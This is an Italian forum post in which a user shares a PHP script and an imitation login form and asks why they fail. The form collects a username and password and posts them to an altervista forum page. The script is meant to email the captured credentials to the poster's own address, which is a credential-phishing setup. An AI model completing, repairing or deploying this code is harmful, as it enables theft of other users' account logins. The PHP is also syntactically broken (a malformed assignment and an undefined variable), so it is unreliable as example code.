nel campo che chiami vari imput cosa ci metto?
EDIT:
sempre stosso errore (Your submission could not be processed because a security token was missing.
If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.)
ho fatto così io
php:
Codice PHP:
<?php
$sendmailto:"mia mail;";
$oggetto = "email";
$testo = "Nome utente: ".$_POST['username'].";
Password: ".$_POST['password'];
mail($mail,$oggetto,$testo)
?>
html
Codice HTML:
<h3>Login</h3>
<form class="form-login" action="http://forum.it.altervista.org/private.php" method="post" name="loginFormElement"><label>Nome utente</label>
<div class="input"><input id="name" type="text" name="username" value="" maxlength="30" /></div>
<label> Password </label>
<div class="input"><input type="password" name="password" value="" maxlength="32" /></div>
<div><input class="button btn-login" onclick="document.forms['loginFormElement'].submit();return false;" type="submit" value="Login" />
------
ma ancora niente non arriva nessuna mail e ho messaggio di errore